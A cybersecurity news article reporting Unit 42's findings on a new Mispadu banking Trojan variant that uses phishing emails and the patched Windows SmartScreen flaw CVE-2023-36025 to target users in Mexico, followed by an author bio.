The Mispadu banking Trojan has once again made headlines, leveraging a now-patched Windows SmartScreen security bypass flaw to compromise users in Mexico. Palo Alto Networks Unit 42, in a recent report, disclosed details of a new variant of the malware, first identified in 2019, illustrating its adaptability and persistence.
Phishing Emails and CVE-2023-36025 Spreading Mispadu
The attack vector involves phishing emails, a common method employed by threat actors to infiltrate systems. Mispadu, a Delphi-based information stealer, has a notorious reputation for specifically targeting victims in the Latin American (LATAM) region. In March 2023, Metabase Q revealed alarming statistics, stating that Mispadu spam campaigns had harvested over 90,000 bank account credentials since August 2022.
Infection Chain
The infection chain identified by Unit 42 reveals a sophisticated approach, employing rogue internet shortcut files within deceptive ZIP archive files. These files exploit CVE-2023-36025, a high-severity bypass flaw in Windows SmartScreen, which Microsoft addressed in November 2023. The flaw allows threat actors to create specially crafted internet shortcut files or hyperlinks that can bypass SmartScreen warnings, revealing a link to a malicious binary hosted on a threat actor’s network share.
Mispadu, upon activation, strategically targets victims based on geographic location and system configurations, establishing contact with a command-and-control (C2) server for subsequent data exfiltration. Notably, this banking Trojan is part of the larger family of LATAM banking malware, sharing connections with Grandoreiro, recently dismantled by Brazilian law enforcement authorities.
Mexico, in recent months, has emerged as a prime target for various cybercrime campaigns, including those propagating information stealers and remote access trojans. Notable among them is the financially-motivated group TA558, known for targeting the hospitality and travel sectors in the LATAM region since 2018.
Previously, the Mispadu trojan has been targeting Brazil as well as other countries in Latin America, a region often preferred by financially motivated cybercriminals.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me: